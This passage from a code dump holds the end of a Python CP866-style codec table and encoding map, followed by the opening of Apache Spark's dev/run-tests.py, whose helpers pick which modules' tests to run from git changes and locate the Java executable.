u'v' # 0x0076 -> LATIN SMALL LETTER V
u'w' # 0x0077 -> LATIN SMALL LETTER W
u'x' # 0x0078 -> LATIN SMALL LETTER X
u'y' # 0x0079 -> LATIN SMALL LETTER Y
u'z' # 0x007a -> LATIN SMALL LETTER Z
u'{' # 0x007b -> LEFT CURLY BRACKET
u'|' # 0x007c -> VERTICAL LINE
u'}' # 0x007d -> RIGHT CURLY BRACKET
u'~' # 0x007e -> TILDE
u'\x7f' # 0x007f -> DELETE
u'\u0410' # 0x0080 -> CYRILLIC CAPITAL LETTER A
u'\u0411' # 0x0081 -> CYRILLIC CAPITAL LETTER BE
u'\u0412' # 0x0082 -> CYRILLIC CAPITAL LETTER VE
u'\u0413' # 0x0083 -> CYRILLIC CAPITAL LETTER GHE
u'\u0414' # 0x0084 -> CYRILLIC CAPITAL LETTER DE
u'\u0415' # 0x0085 -> CYRILLIC CAPITAL LETTER IE
u'\u0416' # 0x0086 -> CYRILLIC CAPITAL LETTER ZHE
u'\u0417' # 0x0087 -> CYRILLIC CAPITAL LETTER ZE
u'\u0418' # 0x0088 -> CYRILLIC CAPITAL LETTER I
u'\u0419' # 0x0089 -> CYRILLIC CAPITAL LETTER SHORT I
u'\u041a' # 0x008a -> CYRILLIC CAPITAL LETTER KA
u'\u041b' # 0x008b -> CYRILLIC CAPITAL LETTER EL
u'\u041c' # 0x008c -> CYRILLIC CAPITAL LETTER EM
u'\u041d' # 0x008d -> CYRILLIC CAPITAL LETTER EN
u'\u041e' # 0x008e -> CYRILLIC CAPITAL LETTER O
u'\u041f' # 0x008f -> CYRILLIC CAPITAL LETTER PE
u'\u0420' # 0x0090 -> CYRILLIC CAPITAL LETTER ER
u'\u0421' # 0x0091 -> CYRILLIC CAPITAL LETTER ES
u'\u0422' # 0x0092 -> CYRILLIC CAPITAL LETTER TE
u'\u0423' # 0x0093 -> CYRILLIC CAPITAL LETTER U
u'\u0424' # 0x0094 -> CYRILLIC CAPITAL LETTER EF
u'\u0425' # 0x0095 -> CYRILLIC CAPITAL LETTER HA
u'\u0426' # 0x0096 -> CYRILLIC CAPITAL LETTER TSE
u'\u0427' # 0x0097 -> CYRILLIC CAPITAL LETTER CHE
u'\u0428' # 0x0098 -> CYRILLIC CAPITAL LETTER SHA
u'\u0429' # 0x0099 -> CYRILLIC CAPITAL LETTER SHCHA
u'\u042a' # 0x009a -> CYRILLIC CAPITAL LETTER HARD SIGN
u'\u042b' # 0x009b -> CYRILLIC CAPITAL LETTER YERU
u'\u042c' # 0x009c -> CYRILLIC CAPITAL LETTER SOFT SIGN
u'\u042d' # 0x009d -> CYRILLIC CAPITAL LETTER E
u'\u042e' # 0x009e -> CYRILLIC CAPITAL LETTER YU
u'\u042f' # 0x009f -> CYRILLIC CAPITAL LETTER YA
u'\u0430' # 0x00a0 -> CYRILLIC SMALL LETTER A
u'\u0431' # 0x00a1 -> CYRILLIC SMALL LETTER BE
u'\u0432' # 0x00a2 -> CYRILLIC SMALL LETTER VE
u'\u0433' # 0x00a3 -> CYRILLIC SMALL LETTER GHE
u'\u0434' # 0x00a4 -> CYRILLIC SMALL LETTER DE
u'\u0435' # 0x00a5 -> CYRILLIC SMALL LETTER IE
u'\u0436' # 0x00a6 -> CYRILLIC SMALL LETTER ZHE
u'\u0437' # 0x00a7 -> CYRILLIC SMALL LETTER ZE
u'\u0438' # 0x00a8 -> CYRILLIC SMALL LETTER I
u'\u0439' # 0x00a9 -> CYRILLIC SMALL LETTER SHORT I
u'\u043a' # 0x00aa -> CYRILLIC SMALL LETTER KA
u'\u043b' # 0x00ab -> CYRILLIC SMALL LETTER EL
u'\u043c' # 0x00ac -> CYRILLIC SMALL LETTER EM
u'\u043d' # 0x00ad -> CYRILLIC SMALL LETTER EN
u'\u043e' # 0x00ae -> CYRILLIC SMALL LETTER O
u'\u043f' # 0x00af -> CYRILLIC SMALL LETTER PE
u'\u2591' # 0x00b0 -> LIGHT SHADE
u'\u2592' # 0x00b1 -> MEDIUM SHADE
u'\u2593' # 0x00b2 -> DARK SHADE
u'\u2502' # 0x00b3 -> BOX DRAWINGS LIGHT VERTICAL
u'\u2524' # 0x00b4 -> BOX DRAWINGS LIGHT VERTICAL AND LEFT
u'\u2561' # 0x00b5 -> BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
u'\u2562' # 0x00b6 -> BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
u'\u2556' # 0x00b7 -> BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
u'\u2555' # 0x00b8 -> BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
u'\u2563' # 0x00b9 -> BOX DRAWINGS DOUBLE VERTICAL AND LEFT
u'\u2551' # 0x00ba -> BOX DRAWINGS DOUBLE VERTICAL
u'\u2557' # 0x00bb -> BOX DRAWINGS DOUBLE DOWN AND LEFT
u'\u255d' # 0x00bc -> BOX DRAWINGS DOUBLE UP AND LEFT
u'\u255c' # 0x00bd -> BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
u'\u255b' # 0x00be -> BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
u'\u2510' # 0x00bf -> BOX DRAWINGS LIGHT DOWN AND LEFT
u'\u2514' # 0x00c0 -> BOX DRAWINGS LIGHT UP AND RIGHT
u'\u2534' # 0x00c1 -> BOX DRAWINGS LIGHT UP AND HORIZONTAL
u'\u252c' # 0x00c2 -> BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
u'\u251c' # 0x00c3 -> BOX DRAWINGS LIGHT VERTICAL AND RIGHT
u'\u2500' # 0x00c4 -> BOX DRAWINGS LIGHT HORIZONTAL
u'\u253c' # 0x00c5 -> BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
u'\u255e' # 0x00c6 -> BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
u'\u255f' # 0x00c7 -> BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
u'\u255a' # 0x00c8 -> BOX DRAWINGS DOUBLE UP AND RIGHT
u'\u2554' # 0x00c9 -> BOX DRAWINGS DOUBLE DOWN AND RIGHT
u'\u2569' # 0x00ca -> BOX DRAWINGS DOUBLE UP AND HORIZONTAL
u'\u2566' # 0x00cb -> BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
u'\u2560' # 0x00cc -> BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
u'\u2550' # 0x00cd -> BOX DRAWINGS DOUBLE HORIZONTAL
u'\u256c' # 0x00ce -> BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
u'\u2567' # 0x00cf -> BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
u'\u2568' # 0x00d0 -> BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
u'\u2564' # 0x00d1 -> BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
u'\u2565' # 0x00d2 -> BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
u'\u2559' # 0x00d3 -> BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
u'\u2558' # 0x00d4 -> BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
u'\u2552' # 0x00d5 -> BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
u'\u2553' # 0x00d6 -> BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
u'\u256b' # 0x00d7 -> BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
u'\u256a' # 0x00d8 -> BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
u'\u2518' # 0x00d9 -> BOX DRAWINGS LIGHT UP AND LEFT
u'\u250c' # 0x00da -> BOX DRAWINGS LIGHT DOWN AND RIGHT
u'\u2588' # 0x00db -> FULL BLOCK
u'\u2584' # 0x00dc -> LOWER HALF BLOCK
u'\u258c' # 0x00dd -> LEFT HALF BLOCK
u'\u2590' # 0x00de -> RIGHT HALF BLOCK
u'\u2580' # 0x00df -> UPPER HALF BLOCK
u'\u0440' # 0x00e0 -> CYRILLIC SMALL LETTER ER
u'\u0441' # 0x00e1 -> CYRILLIC SMALL LETTER ES
u'\u0442' # 0x00e2 -> CYRILLIC SMALL LETTER TE
u'\u0443' # 0x00e3 -> CYRILLIC SMALL LETTER U
u'\u0444' # 0x00e4 -> CYRILLIC SMALL LETTER EF
u'\u0445' # 0x00e5 -> CYRILLIC SMALL LETTER HA
u'\u0446' # 0x00e6 -> CYRILLIC SMALL LETTER TSE
u'\u0447' # 0x00e7 -> CYRILLIC SMALL LETTER CHE
u'\u0448' # 0x00e8 -> CYRILLIC SMALL LETTER SHA
u'\u0449' # 0x00e9 -> CYRILLIC SMALL LETTER SHCHA
u'\u044a' # 0x00ea -> CYRILLIC SMALL LETTER HARD SIGN
u'\u044b' # 0x00eb -> CYRILLIC SMALL LETTER YERU
u'\u044c' # 0x00ec -> CYRILLIC SMALL LETTER SOFT SIGN
u'\u044d' # 0x00ed -> CYRILLIC SMALL LETTER E
u'\u044e' # 0x00ee -> CYRILLIC SMALL LETTER YU
u'\u044f' # 0x00ef -> CYRILLIC SMALL LETTER YA
u'\u0401' # 0x00f0 -> CYRILLIC CAPITAL LETTER IO
u'\u0451' # 0x00f1 -> CYRILLIC SMALL LETTER IO
u'\u0404' # 0x00f2 -> CYRILLIC CAPITAL LETTER UKRAINIAN IE
u'\u0454' # 0x00f3 -> CYRILLIC SMALL LETTER UKRAINIAN IE
u'\u0407' # 0x00f4 -> CYRILLIC CAPITAL LETTER YI
u'\u0457' # 0x00f5 -> CYRILLIC SMALL LETTER YI
u'\u040e' # 0x00f6 -> CYRILLIC CAPITAL LETTER SHORT U
u'\u045e' # 0x00f7 -> CYRILLIC SMALL LETTER SHORT U
u'\xb0' # 0x00f8 -> DEGREE SIGN
u'\u2219' # 0x00f9 -> BULLET OPERATOR
u'\xb7' # 0x00fa -> MIDDLE DOT
u'\u221a' # 0x00fb -> SQUARE ROOT
u'\u2116' # 0x00fc -> NUMERO SIGN
u'\xa4' # 0x00fd -> CURRENCY SIGN
u'\u25a0' # 0x00fe -> BLACK SQUARE
u'\xa0' # 0x00ff -> NO-BREAK SPACE
)
### Encoding Map
encoding_map = {
0x0000: 0x0000, # NULL
0x0001: 0x0001, # START OF HEADING
0x0002: 0x0002, # START OF TEXT
0x0003: 0x0003, # END OF TEXT
0x0004: 0x0004, # END OF TRANSMISSION
0x0005: 0x0005, # ENQUIRY
0x0006: 0x0006, # ACKNOWLEDGE
0x0007: 0x0007, # BELL
0x0008: 0x0008, # BACKSPACE
0x0009: 0x0009, # HORIZONTAL TABULATION
0x000a: 0x000a, # LINE FEED
0x000b: 0x000b, # VERTICAL TABULATION
0x000c: 0x000c, # FORM FEED
0x000d: 0x000d, # CARRIAGE RETURN
0x000e: 0x000e, # SHIFT OUT
0x000f: 0x000f, # SHIFT IN
0x0010: 0x0010, # DATA LINK ESCAPE
0x0011: 0x0011, # DEVICE CONTROL ONE
0x0012: 0x0012, # DEVICE CONTROL TWO
0x0013: 0x0013, # DEVICE CONTROL THREE
0x0014: 0x0014, # DEVICE CONTROL FOUR
0x0015: 0x0015, # NEGATIVE ACKNOWLEDGE
0x0016: 0x0016, # SYNCHRONOUS IDLE
0x0017: 0x0017, # END OF TRANSMISSION BLOCK
0x0018: 0x0018, # CANCEL
0x0019: 0x0019, # END OF MEDIUM
0x001a: 0x001a, # SUBSTITUTE
0x001b: 0x001b, # ESCAPE
0x001c: 0x001c, # FILE SEPARATOR
0x001d: 0x001d, # GROUP SEPARATOR
0x001e: 0x001e, # RECORD SEPARATOR
0x001f: 0x001f, # UNIT SEPARATOR
0x0020: 0x0020, # SPACE
0x0021: 0x0021, # EXCLAMATION MARK
0x0022: 0x0022, # QUOTATION MARK
0x0023: 0x0023, # NUMBER SIGN
0x0024: 0x0024, # DOLLAR SIGN
0x0025: 0x0025, # PERCENT SIGN
0x0026: 0x0026, # AMPERSAND
0x0027: 0x0027, # APOSTROPHE
0x0028: 0x0028, # LEFT PARENTHESIS
0x0029: 0x0029, # RIGHT PARENTHESIS
0x002a: 0x002a, # ASTERISK
0x002b: 0x002b, # PLUS SIGN
0x002c: 0x002c, # COMMA
0x002d: 0x002d, # HYPHEN-MINUS
0x002e: 0x002e, # FULL STOP
0x002f: 0x002f, # SOLIDUS
0x0030: 0x0030, # DIGIT ZERO
0x0031: 0x0031, # DIGIT ONE
0x0032: 0x0032, # DIGIT TWO
0x0033: 0x0033, # DIGIT THREE
0x0034: 0x0034, # DIGIT FOUR
0x0035: 0x0035, # DIGIT FIVE
0x0036: 0x0036, # DIGIT SIX
0x0037: 0x0037, # DIGIT SEVEN
0x0038: 0x0038, # DIGIT EIGHT
0x0039: 0x0039, # DIGIT NINE
0x003a: 0x003a, # COLON
0x003b: 0x003b, # SEMICOLON
0x003c: 0x003c, # LESS-THAN SIGN
0x003d: 0x003d, # EQUALS SIGN
0x003e: 0x003e, # GREATER-THAN SIGN
0x003f: 0x003f, # QUESTION MARK
0x0040: 0x0040, # COMMERCIAL AT
0x0041: 0x0041, # LATIN CAPITAL LETTER A
0x0042: 0x0042, # LATIN CAPITAL LETTER B
0x0043: 0x0043, # LATIN CAPITAL LETTER C
0x0044: 0x0044, # LATIN CAPITAL LETTER D
0x0045: 0x0045, # LATIN CAPITAL LETTER E
0x0046: 0x0046, # LATIN CAPITAL LETTER F
0x0047: 0x0047, # LATIN CAPITAL LETTER G
0x0048: 0x0048, # LATIN CAPITAL LETTER H
0x0049: 0x0049, # LATIN CAPITAL LETTER I
0x004a: 0x004a, # LATIN CAPITAL LETTER J
0x004b: 0x004b, # LATIN CAPITAL LETTER K
0x004c: 0x004c, # LATIN CAPITAL LETTER L
0x004d: 0x004d, # LATIN CAPITAL LETTER M
0x004e: 0x004e, # LATIN CAPITAL LETTER N
0x004f: 0x004f, # LATIN CAPITAL LETTER O
0x0050: 0x0050, # LATIN CAPITAL LETTER P
0x0051: 0x0051, # LATIN CAPITAL LETTER Q
0x0052: 0x0052, # LATIN CAPITAL LETTER R
0x0053: 0x0053, # LATIN CAPITAL LETTER S
0x0054: 0x0054, # LATIN CAPITAL LETTER T
0x0055: 0x0055, # LATIN CAPITAL LETTER U
0x0056: 0x0056, # LATIN CAPITAL LETTER V
0x0057: 0x0057, # LATIN CAPITAL LETTER W
0x0058: 0x0058, # LATIN CAPITAL LETTER X
0x0059: 0x0059, # LATIN CAPITAL LETTER Y
0x005a: 0x005a, # LATIN CAPITAL LETTER Z
0x005b: 0x005b, # LEFT SQUARE BRACKET
0x005c: 0x005c, # REVERSE SOLIDUS
0x005d: 0x005d, # RIGHT SQUARE BRACKET
0x005e: 0x005e, # CIRCUMFLEX ACCENT
0x005f: 0x005f, # LOW LINE
0x0060: 0x0060, # GRAVE ACCENT
0x0061: 0x0061, # LATIN SMALL LETTER A
0x0062: 0x0062, # LATIN SMALL LETTER B
0x0063: 0x0063, # LATIN SMALL LETTER C
0x0064: 0x0064, # LATIN SMALL LETTER D
0x0065: 0x0065, # LATIN SMALL LETTER E
0x0066: 0x0066, # LATIN SMALL LETTER F
0x0067: 0x0067, # LATIN SMALL LETTER G
0x0068: 0x0068, # LATIN SMALL LETTER H
0x0069: 0x0069, # LATIN SMALL LETTER I
0x006a: 0x006a, # LATIN SMALL LETTER J
0x006b: 0x006b, # LATIN SMALL LETTER K
0x006c: 0x006c, # LATIN SMALL LETTER L
0x006d: 0x006d, # LATIN SMALL LETTER M
0x006e: 0x006e, # LATIN SMALL LETTER N
0x006f: 0x006f, # LATIN SMALL LETTER O
0x0070: 0x0070, # LATIN SMALL LETTER P
0x0071: 0x0071, # LATIN SMALL LETTER Q
0x0072: 0x0072, # LATIN SMALL LETTER R
0x0073: 0x0073, # LATIN SMALL LETTER S
0x0074: 0x0074, # LATIN SMALL LETTER T
0x0075: 0x0075, # LATIN SMALL LETTER U
0x0076: 0x0076, # LATIN SMALL LETTER V
0x0077: 0x0077, # LATIN SMALL LETTER W
0x0078: 0x0078, # LATIN SMALL LETTER X
0x0079: 0x0079, # LATIN SMALL LETTER Y
0x007a: 0x007a, # LATIN SMALL LETTER Z
0x007b: 0x007b, # LEFT CURLY BRACKET
0x007c: 0x007c, # VERTICAL LINE
0x007d: 0x007d, # RIGHT CURLY BRACKET
0x007e: 0x007e, # TILDE
0x007f: 0x007f, # DELETE
0x00a0: 0x00ff, # NO-BREAK SPACE
0x00a4: 0x00fd, # CURRENCY SIGN
0x00b0: 0x00f8, # DEGREE SIGN
0x00b7: 0x00fa, # MIDDLE DOT
0x0401: 0x00f0, # CYRILLIC CAPITAL LETTER IO
0x0404: 0x00f2, # CYRILLIC CAPITAL LETTER UKRAINIAN IE
0x0407: 0x00f4, # CYRILLIC CAPITAL LETTER YI
0x040e: 0x00f6, # CYRILLIC CAPITAL LETTER SHORT U
0x0410: 0x0080, # CYRILLIC CAPITAL LETTER A
0x0411: 0x0081, # CYRILLIC CAPITAL LETTER BE
0x0412: 0x0082, # CYRILLIC CAPITAL LETTER VE
0x0413: 0x0083, # CYRILLIC CAPITAL LETTER GHE
0x0414: 0x0084, # CYRILLIC CAPITAL LETTER DE
0x0415: 0x0085, # CYRILLIC CAPITAL LETTER IE
0x0416: 0x0086, # CYRILLIC CAPITAL LETTER ZHE
0x0417: 0x0087, # CYRILLIC CAPITAL LETTER ZE
0x0418: 0x0088, # CYRILLIC CAPITAL LETTER I
0x0419: 0x0089, # CYRILLIC CAPITAL LETTER SHORT I
0x041a: 0x008a, # CYRILLIC CAPITAL LETTER KA
0x041b: 0x008b, # CYRILLIC CAPITAL LETTER EL
0x041c: 0x008c, # CYRILLIC CAPITAL LETTER EM
0x041d: 0x008d, # CYRILLIC CAPITAL LETTER EN
0x041e: 0x008e, # CYRILLIC CAPITAL LETTER O
0x041f: 0x008f, # CYRILLIC CAPITAL LETTER PE
0x0420: 0x0090, # CYRILLIC CAPITAL LETTER ER
0x0421: 0x0091, # CYRILLIC CAPITAL LETTER ES
0x0422: 0x0092, # CYRILLIC CAPITAL LETTER TE
0x0423: 0x0093, # CYRILLIC CAPITAL LETTER U
0x0424: 0x0094, # CYRILLIC CAPITAL LETTER EF
0x0425: 0x0095, # CYRILLIC CAPITAL LETTER HA
0x0426: 0x0096, # CYRILLIC CAPITAL LETTER TSE
0x0427: 0x0097, # CYRILLIC CAPITAL LETTER CHE
0x0428: 0x0098, # CYRILLIC CAPITAL LETTER SHA
0x0429: 0x0099, # CYRILLIC CAPITAL LETTER SHCHA
0x042a: 0x009a, # CYRILLIC CAPITAL LETTER HARD SIGN
0x042b: 0x009b, # CYRILLIC CAPITAL LETTER YERU
0x042c: 0x009c, # CYRILLIC CAPITAL LETTER SOFT SIGN
0x042d: 0x009d, # CYRILLIC CAPITAL LETTER E
0x042e: 0x009e, # CYRILLIC CAPITAL LETTER YU
0x042f: 0x009f, # CYRILLIC CAPITAL LETTER YA
0x0430: 0x00a0, # CYRILLIC SMALL LETTER A
0x0431: 0x00a1, # CYRILLIC SMALL LETTER BE
0x0432: 0x00a2, # CYRILLIC SMALL LETTER VE
0x0433: 0x00a3, # CYRILLIC SMALL LETTER GHE
0x0434: 0x00a4, # CYRILLIC SMALL LETTER DE
0x0435: 0x00a5, # CYRILLIC SMALL LETTER IE
0x0436: 0x00a6, # CYRILLIC SMALL LETTER ZHE
0x0437: 0x00a7, # CYRILLIC SMALL LETTER ZE
0x0438: 0x00a8, # CYRILLIC SMALL LETTER I
0x0439: 0x00a9, # CYRILLIC SMALL LETTER SHORT I
0x043a: 0x00aa, # CYRILLIC SMALL LETTER KA
0x043b: 0x00ab, # CYRILLIC SMALL LETTER EL
0x043c: 0x00ac, # CYRILLIC SMALL LETTER EM
0x043d: 0x00ad, # CYRILLIC SMALL LETTER EN
0x043e: 0x00ae, # CYRILLIC SMALL LETTER O
0x043f: 0x00af, # CYRILLIC SMALL LETTER PE
0x0440: 0x00e0, # CYRILLIC SMALL LETTER ER
0x0441: 0x00e1, # CYRILLIC SMALL LETTER ES
0x0442: 0x00e2, # CYRILLIC SMALL LETTER TE
0x0443: 0x00e3, # CYRILLIC SMALL LETTER U
0x0444: 0x00e4, # CYRILLIC SMALL LETTER EF
0x0445: 0x00e5, # CYRILLIC SMALL LETTER HA
0x0446: 0x00e6, # CYRILLIC SMALL LETTER TSE
0x0447: 0x00e7, # CYRILLIC SMALL LETTER CHE
0x0448: 0x00e8, # CYRILLIC SMALL LETTER SHA
0x0449: 0x00e9, # CYRILLIC SMALL LETTER SHCHA
0x044a: 0x00ea, # CYRILLIC SMALL LETTER HARD SIGN
0x044b: 0x00eb, # CYRILLIC SMALL LETTER YERU
0x044c: 0x00ec, # CYRILLIC SMALL LETTER SOFT SIGN
0x044d: 0x00ed, # CYRILLIC SMALL LETTER E
0x044e: 0x00ee, # CYRILLIC SMALL LETTER YU
0x044f: 0x00ef, # CYRILLIC SMALL LETTER YA
0x0451: 0x00f1, # CYRILLIC SMALL LETTER IO
0x0454: 0x00f3, # CYRILLIC SMALL LETTER UKRAINIAN IE
0x0457: 0x00f5, # CYRILLIC SMALL LETTER YI
0x045e: 0x00f7, # CYRILLIC SMALL LETTER SHORT U
0x2116: 0x00fc, # NUMERO SIGN
0x2219: 0x00f9, # BULLET OPERATOR
0x221a: 0x00fb, # SQUARE ROOT
0x2500: 0x00c4, # BOX DRAWINGS LIGHT HORIZONTAL
0x2502: 0x00b3, # BOX DRAWINGS LIGHT VERTICAL
0x250c: 0x00da, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x2510: 0x00bf, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x2514: 0x00c0, # BOX DRAWINGS LIGHT UP AND RIGHT
0x2518: 0x00d9, # BOX DRAWINGS LIGHT UP AND LEFT
0x251c: 0x00c3, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x2524: 0x00b4, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x252c: 0x00c2, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x2534: 0x00c1, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x253c: 0x00c5, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x2550: 0x00cd, # BOX DRAWINGS DOUBLE HORIZONTAL
0x2551: 0x00ba, # BOX DRAWINGS DOUBLE VERTICAL
0x2552: 0x00d5, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x2553: 0x00d6, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x2554: 0x00c9, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x2555: 0x00b8, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x2556: 0x00b7, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x2557: 0x00bb, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x2558: 0x00d4, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x2559: 0x00d3, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x255a: 0x00c8, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x255b: 0x00be, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x255c: 0x00bd, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x255d: 0x00bc, # BOX DRAWINGS DOUBLE UP AND LEFT
0x255e: 0x00c6, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x255f: 0x00c7, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x2560: 0x00cc, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x2561: 0x00b5, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x2562: 0x00b6, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x2563: 0x00b9, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x2564: 0x00d1, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x2565: 0x00d2, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x2566: 0x00cb, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x2567: 0x00cf, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x2568: 0x00d0, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x2569: 0x00ca, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x256a: 0x00d8, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x256b: 0x00d7, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x256c: 0x00ce, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x2580: 0x00df, # UPPER HALF BLOCK
0x2584: 0x00dc, # LOWER HALF BLOCK
0x2588: 0x00db, # FULL BLOCK
0x258c: 0x00dd, # LEFT HALF BLOCK
0x2590: 0x00de, # RIGHT HALF BLOCK
0x2591: 0x00b0, # LIGHT SHADE
0x2592: 0x00b1, # MEDIUM SHADE
0x2593: 0x00b2, # DARK SHADE
0x25a0: 0x00fe, # BLACK SQUARE
}
| bsd-3-clause |
andrewor14/spark | dev/run-tests.py | 10 | 23605 | #!/usr/bin/env python2
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import itertools
from optparse import OptionParser
import os
import random
import re
import sys
import subprocess
from collections import namedtuple
from sparktestsupport import SPARK_HOME, USER_HOME, ERROR_CODES
from sparktestsupport.shellutils import exit_from_command_with_retcode, run_cmd, rm_r, which
from sparktestsupport.toposort import toposort_flatten, toposort
import sparktestsupport.modules as modules
# -------------------------------------------------------------------------------------------------
# Functions for traversing module dependency graph
# -------------------------------------------------------------------------------------------------
def determine_modules_for_files(filenames):
"""
Given a list of filenames, return the set of modules that contain those files.
If a file is not associated with a more specific submodule, then this method will consider that
file to belong to the 'root' module.
>>> sorted(x.name for x in determine_modules_for_files(["python/pyspark/a.py", "sql/core/foo"]))
['pyspark-core', 'sql']
>>> [x.name for x in determine_modules_for_files(["file_not_matched_by_any_subproject"])]
['root']
"""
changed_modules = set()
for filename in filenames:
matched_at_least_one_module = False
for module in modules.all_modules:
if module.contains_file(filename):
changed_modules.add(module)
matched_at_least_one_module = True
if not matched_at_least_one_module:
changed_modules.add(modules.root)
return changed_modules
def identify_changed_files_from_git_commits(patch_sha, target_branch=None, target_ref=None):
"""
Given a git commit and target ref, use the set of files changed in the diff in order to
determine which modules' tests should be run.
>>> [x.name for x in determine_modules_for_files( \
identify_changed_files_from_git_commits("fc0a1475ef", target_ref="5da21f07"))]
['graphx']
>>> 'root' in [x.name for x in determine_modules_for_files( \
identify_changed_files_from_git_commits("50a0496a43", target_ref="6765ef9"))]
True
"""
if target_branch is None and target_ref is None:
raise AttributeError("must specify either target_branch or target_ref")
elif target_branch is not None and target_ref is not None:
raise AttributeError("must specify either target_branch or target_ref, not both")
if target_branch is not None:
diff_target = target_branch
run_cmd(['git', 'fetch', 'origin', str(target_branch+':'+target_branch)])
else:
diff_target = target_ref
raw_output = subprocess.check_output(['git', 'diff', '--name-only', patch_sha, diff_target],
universal_newlines=True)
# Remove any empty strings
return [f for f in raw_output.split('\n') if f]
def setup_test_environ(environ):
print("[info] Setup the following environment variables for tests: ")
for (k, v) in environ.items():
print("%s=%s" % (k, v))
os.environ[k] = v
def determine_modules_to_test(changed_modules):
"""
Given a set of modules that have changed, compute the transitive closure of those modules'
dependent modules in order to determine the set of modules that should be tested.
Returns a topologically-sorted list of modules (ties are broken by sorting on module names).
>>> [x.name for x in determine_modules_to_test([modules.root])]
['root']
>>> [x.name for x in determine_modules_to_test([modules.build])]
['root']
>>> [x.name for x in determine_modules_to_test([modules.graphx])]
['graphx', 'examples']
>>> x = [x.name for x in determine_modules_to_test([modules.sql])]
>>> x # doctest: +NORMALIZE_WHITESPACE
['sql', 'hive', 'mllib', 'sql-kafka-0-10', 'examples', 'hive-thriftserver',
'pyspark-sql', 'sparkr', 'pyspark-mllib', 'pyspark-ml']
"""
modules_to_test = set()
for module in changed_modules:
modules_to_test = modules_to_test.union(determine_modules_to_test(module.dependent_modules))
modules_to_test = modules_to_test.union(set(changed_modules))
# If we need to run all of the tests, then we should short-circuit and return 'root'
if modules.root in modules_to_test:
return [modules.root]
return toposort_flatten(
{m: set(m.dependencies).intersection(modules_to_test) for m in modules_to_test}, sort=True)
def determine_tags_to_exclude(changed_modules):
tags = []
for m in modules.all_modules:
if m not in changed_modules:
tags += m.test_tags
return tags
# -------------------------------------------------------------------------------------------------
# Functions for working with subprocesses and shell tools
# -------------------------------------------------------------------------------------------------
def determine_java_executable():
"""Will return the path of the java executable that will be used by Spark's
tests or `None`"""
# Any changes in the way that Spark's build detects java must be reflected
# here. Currently the build looks for $JAVA_HOME/bin/java then falls back to
# the `java` executable on the path
java_home = os.environ.get("JAVA_HOME")
# check if there is an executable at $JAVA_HOME/bin/java
java_exe = which(os.path.join(java_home, "bin", "java")) if java_home else None
# if the java_exe wasn't set, check for a `java` version on the $PATH
return java_exe if java_exe else which("java")
JavaVersion = namedtuple('JavaVersion', ['major', 'minor', 'patch'])
def determine_java_version(java_exe):
